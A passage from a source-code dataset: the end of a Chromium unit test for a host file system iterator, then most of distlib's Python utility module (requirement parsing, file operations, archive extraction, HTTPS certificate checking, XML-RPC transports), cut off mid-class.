self._GetStableChannelInfo(28),
self._GetChannelInfo('stable'),
self._GetChannelInfo('beta'),
self._GetChannelInfo('dev')], iterations)
def testDescending(self):
# Start at |master|, and the callback fails immediately. No file systems
# are successfully processed, so Descending() will return None.
iterations, callback = _GetIterationTracker('master')
self.assertEqual(
self._iterator.Descending(self._GetChannelInfo('master'), callback),
None)
self.assertEqual([], iterations)
# Start at |master|, and the callback fails at |dev|. Last good iteration
# should be |master|.
iterations, callback = _GetIterationTracker(
self._GetChannelInfo('dev').version)
self.assertEqual(
self._iterator.Descending(self._GetChannelInfo('master'), callback),
self._GetChannelInfo('master'))
self.assertEqual([self._GetChannelInfo('master')], iterations)
# Start at |master|, and then move from |dev| down to |stable| at version 5.
# Total: 28 file systems.
iterations, callback = _GetIterationTracker(0)
self.assertEqual(
self._iterator.Descending(self._GetChannelInfo('master'), callback),
self._GetStableChannelInfo(5))
self.assertEqual(len(iterations), 28)
# Start at the latest version of |stable|, and move down to |stable| at
# version 5. Total: 25 file systems.
iterations, callback = _GetIterationTracker(0)
self.assertEqual(
self._iterator.Descending(self._GetChannelInfo('stable'), callback),
self._GetStableChannelInfo(5))
self.assertEqual(len(iterations), 25)
# Start at |dev| and iterate down through |stable| versions. The callback
# fails at version 10. Total: 18 file systems.
iterations, callback = _GetIterationTracker(10)
self.assertEqual(
self._iterator.Descending(self._GetChannelInfo('dev'), callback),
self._GetStableChannelInfo(11))
self.assertEqual([self._GetChannelInfo('dev'),
self._GetChannelInfo('beta'),
self._GetChannelInfo('stable'),
self._GetStableChannelInfo(28),
self._GetStableChannelInfo(27),
self._GetStableChannelInfo(26),
self._GetStableChannelInfo(25),
self._GetStableChannelInfo(24),
self._GetStableChannelInfo(23),
self._GetStableChannelInfo(22),
self._GetStableChannelInfo(21),
self._GetStableChannelInfo(20),
self._GetStableChannelInfo(19),
self._GetStableChannelInfo(18),
self._GetStableChannelInfo(17),
self._GetStableChannelInfo(16),
self._GetStableChannelInfo(15),
self._GetStableChannelInfo(14),
self._GetStableChannelInfo(13),
self._GetStableChannelInfo(12),
self._GetStableChannelInfo(11)], iterations)
if __name__ == '__main__':
unittest.main()
|
s20121035/rk3288_android5.1_repo
|
external/chromium_org/chrome/common/extensions/docs/server2/host_file_system_iterator_test.py
|
Python
|
gpl-3.0
| 8,159
|
#
# Copyright (C) 2012-2013 The Python Software Foundation.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import codecs
from collections import deque
import contextlib
import csv
from glob import iglob as std_iglob
import io
import json
import logging
import os
import py_compile
import re
import shutil
import socket
import ssl
import sys
import tarfile
import tempfile
import time
import zipfile
from . import DistlibException
from .compat import (string_types, text_type, shutil, raw_input,
cache_from_source, urlopen, httplib, xmlrpclib, splittype,
HTTPHandler, HTTPSHandler as BaseHTTPSHandler,
URLError, match_hostname, CertificateError)
logger = logging.getLogger(__name__)
class Container(object):
"""
A generic container for when multiple values need to be returned
"""
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
#
# Requirement parsing code for name + optional constraints + optional extras
#
# e.g. 'foo >= 1.2, < 2.0 [bar, baz]'
#
# The regex can seem a bit hairy, so we build it up out of smaller pieces
# which are manageable.
#
COMMA = r'\s*,\s*'
COMMA_RE = re.compile(COMMA)
IDENT = r'(\w|[.-])+'
RELOP = '([<>=!]=)|[<>]'
#
# The first relop is optional - if absent, will be taken as '=='
#
BARE_CONSTRAINTS = ('(' + RELOP + r')?\s*(' + IDENT + ')(' + COMMA + '(' +
RELOP + r')\s*(' + IDENT + '))*')
#
# Either the bare constraints or the bare constraints in parentheses
#
CONSTRAINTS = (r'\(\s*(?P<c1>' + BARE_CONSTRAINTS + r')\s*\)|(?P<c2>' +
BARE_CONSTRAINTS + '\s*)')
EXTRA_LIST = IDENT + '(' + COMMA + IDENT + ')*'
EXTRAS = r'\[\s*(?P<ex>' + EXTRA_LIST + r')?\s*\]'
REQUIREMENT = ('(?P<dn>' + IDENT + r')\s*(' + EXTRAS + r'\s*)?(\s*' +
CONSTRAINTS + ')?$')
REQUIREMENT_RE = re.compile(REQUIREMENT)
#
# Used to scan through the constraints
#
RELOP_IDENT = '(?P<op>' + RELOP + r')\s*(?P<vn>' + IDENT + ')'
RELOP_IDENT_RE = re.compile(RELOP_IDENT)
def parse_requirement(s):
def get_constraint(m):
d = m.groupdict()
return d['op'], d['vn']
result = None
m = REQUIREMENT_RE.match(s)
if m:
d = m.groupdict()
name = d['dn']
cons = d['c1'] or d['c2']
if not cons:
cons = None
constr = ''
rs = d['dn']
else:
if cons[0] not in '<>!=':
cons = '==' + cons
iterator = RELOP_IDENT_RE.finditer(cons)
cons = [get_constraint(m) for m in iterator]
rs = '%s (%s)' % (name, ', '.join(['%s %s' % con for con in cons]))
if not d['ex']:
extras = None
else:
extras = COMMA_RE.split(d['ex'])
result = Container(name=name, constraints=cons, extras=extras,
requirement=rs, source=s)
return result
def get_resources_dests(resources_root, rules):
"""Find destinations for resources files"""
def get_rel_path(base, path):
# normalizes and returns a lstripped-/-separated path
base = base.replace(os.path.sep, '/')
path = path.replace(os.path.sep, '/')
assert path.startswith(base)
return path[len(base):].lstrip('/')
destinations = {}
for base, suffix, dest in rules:
prefix = os.path.join(resources_root, base)
for abs_base in iglob(prefix):
abs_glob = os.path.join(abs_base, suffix)
for abs_path in iglob(abs_glob):
resource_file = get_rel_path(resources_root, abs_path)
if dest is None: # remove the entry if it was here
destinations.pop(resource_file, None)
else:
rel_path = get_rel_path(abs_base, abs_path)
rel_dest = dest.replace(os.path.sep, '/').rstrip('/')
destinations[resource_file] = rel_dest + '/' + rel_path
return destinations
def in_venv():
if hasattr(sys, 'real_prefix'):
# virtualenv venvs
result = True
else:
# PEP 405 venvs
result = sys.prefix != getattr(sys, 'base_prefix', sys.prefix)
return result
def get_executable():
if sys.platform == 'darwin' and ('__VENV_LAUNCHER__'
in os.environ):
result = os.environ['__VENV_LAUNCHER__']
else:
result = sys.executable
return result
def proceed(prompt, allowed_chars, error_prompt=None, default=None):
p = prompt
while True:
s = raw_input(p)
p = prompt
if not s and default:
s = default
if s:
c = s[0].lower()
if c in allowed_chars:
break
if error_prompt:
p = '%c: %s\n%s' % (c, error_prompt, prompt)
return c
@contextlib.contextmanager
def tempdir():
td = tempfile.mkdtemp()
try:
yield td
finally:
shutil.rmtree(td)
@contextlib.contextmanager
def chdir(d):
cwd = os.getcwd()
try:
os.chdir(d)
yield
finally:
os.chdir(cwd)
@contextlib.contextmanager
def socket_timeout(seconds=15):
cto = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(seconds)
yield
finally:
socket.setdefaulttimeout(cto)
class cached_property(object):
def __init__(self, func):
self.func = func
#for attr in ('__name__', '__module__', '__doc__'):
# setattr(self, attr, getattr(func, attr, None))
def __get__(self, obj, type=None):
if obj is None:
return self
value = self.func(obj)
object.__setattr__(obj, self.func.__name__, value)
#obj.__dict__[self.func.__name__] = value = self.func(obj)
return value
def convert_path(pathname):
"""Return 'pathname' as a name that will work on the native filesystem.
The path is split on '/' and put back together again using the current
directory separator. Needed because filenames in the setup script are
always supplied in Unix style, and have to be converted to the local
convention before we can actually use them in the filesystem. Raises
ValueError on non-Unix-ish systems if 'pathname' either starts or
ends with a slash.
"""
if os.sep == '/':
return pathname
if not pathname:
return pathname
if pathname[0] == '/':
raise ValueError("path '%s' cannot be absolute" % pathname)
if pathname[-1] == '/':
raise ValueError("path '%s' cannot end with '/'" % pathname)
paths = pathname.split('/')
while os.curdir in paths:
paths.remove(os.curdir)
if not paths:
return os.curdir
return os.path.join(*paths)
class FileOperator(object):
def __init__(self, dry_run=False):
self.dry_run = dry_run
self.ensured = set()
self._init_record()
def _init_record(self):
self.record = False
self.files_written = set()
self.dirs_created = set()
def record_as_written(self, path):
if self.record:
self.files_written.add(path)
def newer(self, source, target):
"""Tell if the target is newer than the source.
Returns true if 'source' exists and is more recently modified than
'target', or if 'source' exists and 'target' doesn't.
Returns false if both exist and 'target' is the same age or younger
than 'source'. Raise PackagingFileError if 'source' does not exist.
Note that this test is not very accurate: files created in the same
second will have the same "age".
"""
if not os.path.exists(source):
raise DistlibException("file '%r' does not exist" %
os.path.abspath(source))
if not os.path.exists(target):
return True
return os.stat(source).st_mtime > os.stat(target).st_mtime
def copy_file(self, infile, outfile):
"""Copy a file respecting dry-run and force flags.
"""
assert not os.path.isdir(outfile)
self.ensure_dir(os.path.dirname(outfile))
logger.info('Copying %s to %s', infile, outfile)
if not self.dry_run:
shutil.copyfile(infile, outfile)
if self.record:
self.files_written.add(outfile)
def copy_stream(self, instream, outfile, encoding=None):
assert not os.path.isdir(outfile)
self.ensure_dir(os.path.dirname(outfile))
logger.info('Copying stream %s to %s', instream, outfile)
if not self.dry_run:
if encoding is None:
outstream = open(outfile, 'wb')
else:
outstream = codecs.open(outfile, 'w', encoding=encoding)
try:
shutil.copyfileobj(instream, outstream)
finally:
outstream.close()
if self.record:
self.files_written.add(outfile)
def write_binary_file(self, path, data):
self.ensure_dir(os.path.dirname(path))
if not self.dry_run:
with open(path, 'wb') as f:
f.write(data)
if self.record:
self.files_written.add(path)
def write_text_file(self, path, data, encoding):
self.ensure_dir(os.path.dirname(path))
if not self.dry_run:
with open(path, 'wb') as f:
f.write(data.encode(encoding))
if self.record:
self.files_written.add(path)
def set_mode(self, bits, mask, files):
if os.name == 'posix':
# Set the executable bits (owner, group, and world) on
# all the files specified.
for f in files:
if self.dry_run:
logger.info("changing mode of %s", f)
else:
mode = (os.stat(f).st_mode | bits) & mask
logger.info("changing mode of %s to %o", f, mode)
os.chmod(f, mode)
set_executable_mode = lambda s, f: s.set_mode(0o555, 0o7777, f)
def ensure_dir(self, path):
path = os.path.abspath(path)
if path not in self.ensured and not os.path.exists(path):
self.ensured.add(path)
d, f = os.path.split(path)
self.ensure_dir(d)
logger.info('Creating %s' % path)
if not self.dry_run:
os.mkdir(path)
if self.record:
self.dirs_created.add(path)
def byte_compile(self, path, optimize=False, force=False, prefix=None):
dpath = cache_from_source(path, not optimize)
logger.info('Byte-compiling %s to %s', path, dpath)
if not self.dry_run:
if force or self.newer(path, dpath):
if not prefix:
diagpath = None
else:
assert path.startswith(prefix)
diagpath = path[len(prefix):]
py_compile.compile(path, dpath, diagpath, True) # raise on error
if self.record:
self.files_written.add(dpath)
return dpath
def ensure_removed(self, path):
if os.path.exists(path):
if os.path.isdir(path) and not os.path.islink(path):
logger.debug('Removing directory tree at %s', path)
if not self.dry_run:
shutil.rmtree(path)
if self.record:
if path in self.dirs_created:
self.dirs_created.remove(path)
else:
if os.path.islink(path):
s = 'link'
else:
s = 'file'
logger.debug('Removing %s %s', s, path)
if not self.dry_run:
os.remove(path)
if self.record:
if path in self.files_written:
self.files_written.remove(path)
def is_writable(self, path):
result = False
while not result:
if os.path.exists(path):
result = os.access(path, os.W_OK)
break
parent = os.path.dirname(path)
if parent == path:
break
path = parent
return result
def commit(self):
"""
Commit recorded changes, turn off recording, return
changes.
"""
assert self.record
result = self.files_written, self.dirs_created
self._init_record()
return result
def rollback(self):
if not self.dry_run:
for f in list(self.files_written):
if os.path.exists(f):
os.remove(f)
# dirs should all be empty now, except perhaps for
# __pycache__ subdirs
# reverse so that subdirs appear before their parents
dirs = sorted(self.dirs_created, reverse=True)
for d in dirs:
flist = os.listdir(d)
if flist:
assert flist == ['__pycache__']
sd = os.path.join(d, flist[0])
os.rmdir(sd)
os.rmdir(d) # should fail if non-empty
self._init_record()
def resolve(module_name, dotted_path):
if module_name in sys.modules:
mod = sys.modules[module_name]
else:
mod = __import__(module_name)
if dotted_path is None:
result = mod
else:
parts = dotted_path.split('.')
result = getattr(mod, parts.pop(0))
for p in parts:
result = getattr(result, p)
return result
class ExportEntry(object):
def __init__(self, name, prefix, suffix, flags):
self.name = name
self.prefix = prefix
self.suffix = suffix
self.flags = flags
@cached_property
def value(self):
return resolve(self.prefix, self.suffix)
def __repr__(self):
return '<ExportEntry %s = %s:%s %s>' % (self.name, self.prefix,
self.suffix, self.flags)
def __eq__(self, other):
if not isinstance(other, ExportEntry):
result = False
else:
result = (self.name == other.name and
self.prefix == other.prefix and
self.suffix == other.suffix and
self.flags == other.flags)
return result
__hash__ = object.__hash__
ENTRY_RE = re.compile(r'''(?P<name>(\w|[-.])+)
\s*=\s*(?P<callable>(\w+)([:\.]\w+)*)
\s*(\[\s*(?P<flags>\w+(=\w+)?(,\s*\w+(=\w+)?)*)\s*\])?
''', re.VERBOSE)
def get_export_entry(specification):
m = ENTRY_RE.search(specification)
if not m:
result = None
if '[' in specification or ']' in specification:
raise DistlibException('Invalid specification '
'%r' % specification)
else:
d = m.groupdict()
name = d['name']
path = d['callable']
colons = path.count(':')
if colons == 0:
prefix, suffix = path, None
else:
if colons != 1:
raise DistlibException('Invalid specification '
'%r' % specification)
prefix, suffix = path.split(':')
flags = d['flags']
if flags is None:
if '[' in specification or ']' in specification:
raise DistlibException('Invalid specification '
'%r' % specification)
flags = []
else:
flags = [f.strip() for f in flags.split(',')]
result = ExportEntry(name, prefix, suffix, flags)
return result
def get_cache_base(suffix=None):
"""
Return the default base location for distlib caches. If the directory does
not exist, it is created. Use the suffix provided for the base directory,
and default to '.distlib' if it isn't provided.
On Windows, if LOCALAPPDATA is defined in the environment, then it is
assumed to be a directory, and will be the parent directory of the result.
On POSIX, and on Windows if LOCALAPPDATA is not defined, the user's home
directory - using os.expanduser('~') - will be the parent directory of
the result.
The result is just the directory '.distlib' in the parent directory as
determined above, or with the name specified with ``suffix``.
"""
if suffix is None:
suffix = '.distlib'
if os.name == 'nt' and 'LOCALAPPDATA' in os.environ:
result = os.path.expandvars('$localappdata')
else:
# Assume posix, or old Windows
result = os.path.expanduser('~')
result = os.path.join(result, suffix)
# we use 'isdir' instead of 'exists', because we want to
# fail if there's a file with that name
if not os.path.isdir(result):
os.makedirs(result)
return result
def path_to_cache_dir(path):
"""
Convert an absolute path to a directory name for use in a cache.
The algorithm used is:
#. On Windows, any ``':'`` in the drive is replaced with ``'---'``.
#. Any occurrence of ``os.sep`` is replaced with ``'--'``.
#. ``'.cache'`` is appended.
"""
d, p = os.path.splitdrive(os.path.abspath(path))
if d:
d = d.replace(':', '---')
p = p.replace(os.sep, '--')
return d + p + '.cache'
def ensure_slash(s):
if not s.endswith('/'):
return s + '/'
return s
def parse_credentials(netloc):
username = password = None
if '@' in netloc:
prefix, netloc = netloc.split('@', 1)
if ':' not in prefix:
username = prefix
else:
username, password = prefix.split(':', 1)
return username, password, netloc
def get_process_umask():
result = os.umask(0o22)
os.umask(result)
return result
def is_string_sequence(seq):
result = True
i = None
for i, s in enumerate(seq):
if not isinstance(s, string_types):
result = False
break
assert i is not None
return result
PROJECT_NAME_AND_VERSION = re.compile('([a-z0-9_]+([.-][a-z_][a-z0-9_]*)*)-'
'([0-9][a-z0-9_.+-]*)', re.I)
PYTHON_VERSION = re.compile(r'-py(\d\.?\d?)$')
def split_filename(filename, project_name=None):
"""
Extract name, version, python version from a filename (no extension)
Return name, version, pyver or None
"""
result = None
pyver = None
m = PYTHON_VERSION.search(filename)
if m:
pyver = m.group(1)
filename = filename[:m.start()]
if project_name and len(filename) > len(project_name) + 1:
m = re.match(re.escape(project_name) + r'\b', filename)
if m:
n = m.end()
result = filename[:n], filename[n + 1:], pyver
if result is None:
m = PROJECT_NAME_AND_VERSION.match(filename)
if m:
result = m.group(1), m.group(3), pyver
return result
#
# Extended metadata functionality
#
def _get_external_data(url):
result = {}
try:
# urlopen might fail if it runs into redirections,
# because of Python issue #13696. Fixed in locators
# using a custom redirect handler.
resp = urlopen(url)
headers = resp.info()
if headers.get('Content-Type') != 'application/json':
logger.debug('Unexpected response for JSON request')
else:
reader = codecs.getreader('utf-8')(resp)
#data = reader.read().decode('utf-8')
#result = json.loads(data)
result = json.load(reader)
except Exception as e:
logger.exception('Failed to get external data for %s: %s', url, e)
return result
def get_project_data(name):
url = ('https://www.red-dove.com/pypi/projects/'
'%s/%s/project.json' % (name[0].upper(), name))
result = _get_external_data(url)
return result
def get_package_data(dist):
name, version = dist.name, dist.version
url = ('https://www.red-dove.com/pypi/projects/'
'%s/%s/package-%s.json' % (name[0].upper(), name, version))
result = _get_external_data(url)
if 'metadata' in result and dist.metadata:
update_metadata(dist.metadata, result)
return result
RENAMES = { # Temporary
'classifiers': 'Classifier',
'use_2to3': None,
'use_2to3_fixers': None,
'test_suite': None,
}
def update_metadata(metadata, pkginfo):
# update dist's metadata from received package data
assert metadata
assert 'metadata' in pkginfo
for k, v in pkginfo['metadata'].items():
k = k.replace('-', '_')
k = RENAMES.get(k, k)
if k is not None:
metadata[k] = v
metadata.set_metadata_version()
if 'requirements' in pkginfo:
metadata.dependencies = pkginfo['requirements']
#
# Simple event pub/sub
#
class EventMixin(object):
"""
A very simple publish/subscribe system.
"""
def __init__(self):
self._subscribers = {}
def add(self, event, subscriber, append=True):
"""
Add a subscriber for an event.
:param event: The name of an event.
:param subscriber: The subscriber to be added (and called when the
event is published).
:param append: Whether to append or prepend the subscriber to an
existing subscriber list for the event.
"""
subs = self._subscribers
if event not in subs:
subs[event] = deque([subscriber])
else:
sq = subs[event]
if append:
sq.append(subscriber)
else:
sq.appendleft(subscriber)
def remove(self, event, subscriber):
"""
Remove a subscriber for an event.
:param event: The name of an event.
:param subscriber: The subscriber to be removed.
"""
subs = self._subscribers
if event not in subs:
raise ValueError('No subscribers: %r' % event)
subs[event].remove(subscriber)
def get_subscribers(self, event):
"""
Return an iterator for the subscribers for an event.
:param event: The event to return subscribers for.
"""
return iter(self._subscribers.get(event, ()))
def publish(self, event, *args, **kwargs):
"""
Publish a event and return a list of values returned by its
subscribers.
:param event: The event to publish.
:param args: The positional arguments to pass to the event's
subscribers.
:param kwargs: The keyword arguments to pass to the event's
subscribers.
"""
result = []
for subscriber in self.get_subscribers(event):
try:
value = subscriber(event, *args, **kwargs)
except Exception:
logger.exception('Exception during event publication')
value = None
result.append(value)
logger.debug('publish %s: args = %s, kwargs = %s, result = %s',
event, args, kwargs, result)
return result
#
# Simple sequencing
#
class Sequencer(object):
def __init__(self):
self._preds = {}
self._succs = {}
self._nodes = set() # nodes with no preds/succs
def add_node(self, node):
self._nodes.add(node)
def remove_node(self, node):
self._nodes.remove(node)
def add(self, pred, succ):
assert pred != succ
self._preds.setdefault(succ, set()).add(pred)
self._succs.setdefault(pred, set()).add(succ)
def remove(self, pred, succ):
assert pred != succ
try:
preds = self._preds[succ]
succs = self._succs[pred]
except KeyError:
raise ValueError('%r not a successor of anything' % succ)
try:
preds.remove(pred)
succs.remove(succ)
except KeyError:
raise ValueError('%r not a successor of %r' % (succ, pred))
def is_step(self, step):
return (step in self._preds or step in self._succs or
step in self._nodes)
def get_steps(self, final):
if not self.is_step(final):
raise ValueError('Unknown: %r' % final)
result = []
todo = []
seen = set()
todo.append(final)
while todo:
step = todo.pop(0)
if step in seen:
# if a step was already seen,
# move it to the end (so it will appear earlier
# when reversed on return) ... but not for the
# final step, as that would be confusing for
# users
if step != final:
result.remove(step)
result.append(step)
else:
seen.add(step)
result.append(step)
preds = self._preds.get(step, ())
todo.extend(preds)
return reversed(result)
@property
def strong_connections(self):
#http://en.wikipedia.org/wiki/Tarjan%27s_strongly_connected_components_algorithm
index_counter = [0]
stack = []
lowlinks = {}
index = {}
result = []
graph = self._succs
def strongconnect(node):
# set the depth index for this node to the smallest unused index
index[node] = index_counter[0]
lowlinks[node] = index_counter[0]
index_counter[0] += 1
stack.append(node)
# Consider successors
try:
successors = graph[node]
except Exception:
successors = []
for successor in successors:
if successor not in lowlinks:
# Successor has not yet been visited
strongconnect(successor)
lowlinks[node] = min(lowlinks[node],lowlinks[successor])
elif successor in stack:
# the successor is in the stack and hence in the current
# strongly connected component (SCC)
lowlinks[node] = min(lowlinks[node],index[successor])
# If `node` is a root node, pop the stack and generate an SCC
if lowlinks[node] == index[node]:
connected_component = []
while True:
successor = stack.pop()
connected_component.append(successor)
if successor == node: break
component = tuple(connected_component)
# storing the result
result.append(component)
for node in graph:
if node not in lowlinks:
strongconnect(node)
return result
@property
def dot(self):
result = ['digraph G {']
for succ in self._preds:
preds = self._preds[succ]
for pred in preds:
result.append(' %s -> %s;' % (pred, succ))
for node in self._nodes:
result.append(' %s;' % node)
result.append('}')
return '\n'.join(result)
#
# Unarchiving functionality for zip, tar, tgz, tbz, whl
#
ARCHIVE_EXTENSIONS = ('.tar.gz', '.tar.bz2', '.tar', '.zip',
'.tgz', '.tbz', '.whl')
def unarchive(archive_filename, dest_dir, format=None, check=True):
def check_path(path):
if not isinstance(path, text_type):
path = path.decode('utf-8')
p = os.path.abspath(os.path.join(dest_dir, path))
if not p.startswith(dest_dir) or p[plen] != os.sep:
raise ValueError('path outside destination: %r' % p)
dest_dir = os.path.abspath(dest_dir)
plen = len(dest_dir)
archive = None
if format is None:
if archive_filename.endswith(('.zip', '.whl')):
format = 'zip'
elif archive_filename.endswith(('.tar.gz', '.tgz')):
format = 'tgz'
mode = 'r:gz'
elif archive_filename.endswith(('.tar.bz2', '.tbz')):
format = 'tbz'
mode = 'r:bz2'
elif archive_filename.endswith('.tar'):
format = 'tar'
mode = 'r'
else:
raise ValueError('Unknown format for %r' % archive_filename)
try:
if format == 'zip':
archive = zipfile.ZipFile(archive_filename, 'r')
if check:
names = archive.namelist()
for name in names:
check_path(name)
else:
archive = tarfile.open(archive_filename, mode)
if check:
names = archive.getnames()
for name in names:
check_path(name)
if format != 'zip' and sys.version_info[0] < 3:
# See Python issue 17153. If the dest path contains Unicode,
# tarfile extraction fails on Python 2.x if a member path name
# contains non-ASCII characters - it leads to an implicit
# bytes -> unicode conversion using ASCII to decode.
for tarinfo in archive.getmembers():
if not isinstance(tarinfo.name, text_type):
tarinfo.name = tarinfo.name.decode('utf-8')
archive.extractall(dest_dir)
finally:
if archive:
archive.close()
def zip_dir(directory):
"""zip a directory tree into a BytesIO object"""
result = io.BytesIO()
dlen = len(directory)
with zipfile.ZipFile(result, "w") as zf:
for root, dirs, files in os.walk(directory):
for name in files:
full = os.path.join(root, name)
rel = root[dlen:]
dest = os.path.join(rel, name)
zf.write(full, dest)
return result
#
# Simple progress bar
#
UNITS = ('', 'K', 'M', 'G','T','P')
class Progress(object):
unknown = 'UNKNOWN'
def __init__(self, minval=0, maxval=100):
assert maxval is None or maxval >= minval
self.min = self.cur = minval
self.max = maxval
self.started = None
self.elapsed = 0
self.done = False
def update(self, curval):
assert self.min <= curval
assert self.max is None or curval <= self.max
self.cur = curval
now = time.time()
if self.started is None:
self.started = now
else:
self.elapsed = now - self.started
def increment(self, incr):
assert incr >= 0
self.update(self.cur + incr)
def start(self):
self.update(self.min)
return self
def stop(self):
if self.max is not None:
self.update(self.max)
self.done = True
@property
def maximum(self):
return self.unknown if self.max is None else self.max
@property
def percentage(self):
if self.done:
result = '100 %'
elif self.max is None:
result = ' ?? %'
else:
v = 100.0 * (self.cur - self.min) / (self.max - self.min)
result = '%3d %%' % v
return result
def format_duration(self, duration):
if (duration <= 0) and self.max is None or self.cur == self.min:
result = '??:??:??'
#elif duration < 1:
# result = '--:--:--'
else:
result = time.strftime('%H:%M:%S', time.gmtime(duration))
return result
@property
def ETA(self):
if self.done:
prefix = 'Done'
t = self.elapsed
#import pdb; pdb.set_trace()
else:
prefix = 'ETA '
if self.max is None:
t = -1
elif self.elapsed == 0 or (self.cur == self.min):
t = 0
else:
#import pdb; pdb.set_trace()
t = float(self.max - self.min)
t /= self.cur - self.min
t = (t - 1) * self.elapsed
return '%s: %s' % (prefix, self.format_duration(t))
@property
def speed(self):
if self.elapsed == 0:
result = 0.0
else:
result = (self.cur - self.min) / self.elapsed
for unit in UNITS:
if result < 1000:
break
result /= 1000.0
return '%d %sB/s' % (result, unit)
#
# Glob functionality
#
RICH_GLOB = re.compile(r'\{([^}]*)\}')
_CHECK_RECURSIVE_GLOB = re.compile(r'[^/\\,{]\*\*|\*\*[^/\\,}]')
_CHECK_MISMATCH_SET = re.compile(r'^[^{]*\}|\{[^}]*$')
def iglob(path_glob):
"""Extended globbing function that supports ** and {opt1,opt2,opt3}."""
if _CHECK_RECURSIVE_GLOB.search(path_glob):
msg = """invalid glob %r: recursive glob "**" must be used alone"""
raise ValueError(msg % path_glob)
if _CHECK_MISMATCH_SET.search(path_glob):
msg = """invalid glob %r: mismatching set marker '{' or '}'"""
raise ValueError(msg % path_glob)
return _iglob(path_glob)
def _iglob(path_glob):
rich_path_glob = RICH_GLOB.split(path_glob, 1)
if len(rich_path_glob) > 1:
assert len(rich_path_glob) == 3, rich_path_glob
prefix, set, suffix = rich_path_glob
for item in set.split(','):
for path in _iglob(''.join((prefix, item, suffix))):
yield path
else:
if '**' not in path_glob:
for item in std_iglob(path_glob):
yield item
else:
prefix, radical = path_glob.split('**', 1)
if prefix == '':
prefix = '.'
if radical == '':
radical = '*'
else:
# we support both
radical = radical.lstrip('/')
radical = radical.lstrip('\\')
for path, dir, files in os.walk(prefix):
path = os.path.normpath(path)
for file in _iglob(os.path.join(path, radical)):
yield file
#
# HTTPSConnection which verifies certificates/matches domains
#
class HTTPSConnection(httplib.HTTPSConnection):
ca_certs = None # set this to the path to the certs file (.pem)
check_domain = True # only used if ca_certs is not None
# noinspection PyPropertyAccess
def connect(self):
sock = socket.create_connection((self.host, self.port), self.timeout)
if getattr(self, '_tunnel_host', False):
self.sock = sock
self._tunnel()
if not hasattr(ssl, 'SSLContext'):
# For 2.x
if self.ca_certs:
cert_reqs = ssl.CERT_REQUIRED
else:
cert_reqs = ssl.CERT_NONE
self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file,
cert_reqs=cert_reqs,
ssl_version=ssl.PROTOCOL_SSLv23,
ca_certs=self.ca_certs)
else:
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.options |= ssl.OP_NO_SSLv2
if self.cert_file:
context.load_cert_chain(self.cert_file, self.key_file)
kwargs = {}
if self.ca_certs:
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(cafile=self.ca_certs)
if getattr(ssl, 'HAS_SNI', False):
kwargs['server_hostname'] = self.host
self.sock = context.wrap_socket(sock, **kwargs)
if self.ca_certs and self.check_domain:
try:
match_hostname(self.sock.getpeercert(), self.host)
except CertificateError:
self.sock.shutdown(socket.SHUT_RDWR)
self.sock.close()
raise
class HTTPSHandler(BaseHTTPSHandler):
def __init__(self, ca_certs, check_domain=True):
BaseHTTPSHandler.__init__(self)
self.ca_certs = ca_certs
self.check_domain = check_domain
def _conn_maker(self, *args, **kwargs):
"""
This is called to create a connection instance. Normally you'd
pass a connection class to do_open, but it doesn't actually check for
a class, and just expects a callable. As long as we behave just as a
constructor would have, we should be OK. If it ever changes so that
we *must* pass a class, we'll create an UnsafeHTTPSConnection class
which just sets check_domain to False in the class definition, and
choose which one to pass to do_open.
"""
result = HTTPSConnection(*args, **kwargs)
if self.ca_certs:
result.ca_certs = self.ca_certs
result.check_domain = self.check_domain
return result
def https_open(self, req):
try:
return self.do_open(self._conn_maker, req)
except URLError as e:
if 'certificate verify failed' in str(e.reason):
raise CertificateError('Unable to verify server certificate '
'for %s' % req.host)
else:
raise
#
# To prevent against mixing HTTP traffic with HTTPS (examples: A Man-In-The-
# Middle proxy using HTTP listens on port 443, or an index mistakenly serves
# HTML containing a http://xyz link when it should be https://xyz),
# you can use the following handler class, which does not allow HTTP traffic.
#
# It works by inheriting from HTTPHandler - so build_opener won't add a
# handler for HTTP itself.
#
class HTTPSOnlyHandler(HTTPSHandler, HTTPHandler):
def http_open(self, req):
raise URLError('Unexpected HTTP request on what should be a secure '
'connection: %s' % req)
#
# XML-RPC with timeouts
#
_ver_info = sys.version_info[:2]
if _ver_info == (2, 6):
class HTTP(httplib.HTTP):
def __init__(self, host='', port=None, **kwargs):
if port == 0: # 0 means use port 0, not the default port
port = None
self._setup(self._connection_class(host, port, **kwargs))
class HTTPS(httplib.HTTPS):
def __init__(self, host='', port=None, **kwargs):
if port == 0: # 0 means use port 0, not the default port
port = None
self._setup(self._connection_class(host, port, **kwargs))
class Transport(xmlrpclib.Transport):
def __init__(self, timeout, use_datetime=0):
self.timeout = timeout
xmlrpclib.Transport.__init__(self, use_datetime)
def make_connection(self, host):
h, eh, x509 = self.get_host_info(host)
if _ver_info == (2, 6):
result = HTTP(h, timeout=self.timeout)
else:
if not self._connection or host != self._connection[0]:
self._extra_headers = eh
self._connection = host, httplib.HTTPConnection(h)
result = self._connection[1]
return result
class SafeTransport(xmlrpclib.SafeTransport):
def __init__(self, timeout, use_datetime=0):
self.timeout = timeout
xmlrpclib.SafeTransport.__init__(self, use_datetime)
def make_connection(self, host):
h, eh, kwargs = self.get_host_info(host)
if not kwargs:
kwargs = {}
kwargs['timeout'] = self.timeout
if _ver_info == (2, 6):
result = HTTPS(host, None, **kwargs)
else:
if not self._connection or host != self._connection[0]:
self._extra_headers = eh
self._connection = host, httplib.HTTPSConnection(h, None,
**kwargs)
result = self._connection[1]
return result
class ServerProxy(xmlrpclib.ServerProxy):
def __init__(self, uri, **kwargs):
self.timeout = timeout = kwargs.pop('timeout', None)
# The above classes only come into play if a timeout
# is specified
if timeout is not None:
scheme, _ = splittype(uri)
use_datetime = kwargs.get('use_datetime', 0)
if scheme == 'https':
tcls = SafeTransport
else:
tcls = Transport
kwargs['transport'] = t = tcls(timeout, use_datetime=use_datetime)
self.transport = t
xmlrpclib.ServerProxy.__init__(self, uri, **kwargs)
#
# CSV functionality. This is provided because on 2.x, the csv module can't
# handle Unicode. However, we need to deal with Unicode in e.g. RECORD files.
#
def _csv_open(fn, mode, **kwargs):
if sys.version_info[0] < 3:
mode += 'b'
else:
kwargs['newline'] = ''
return open(fn, mode, **kwargs)
class CSVBase(object):
defaults = {
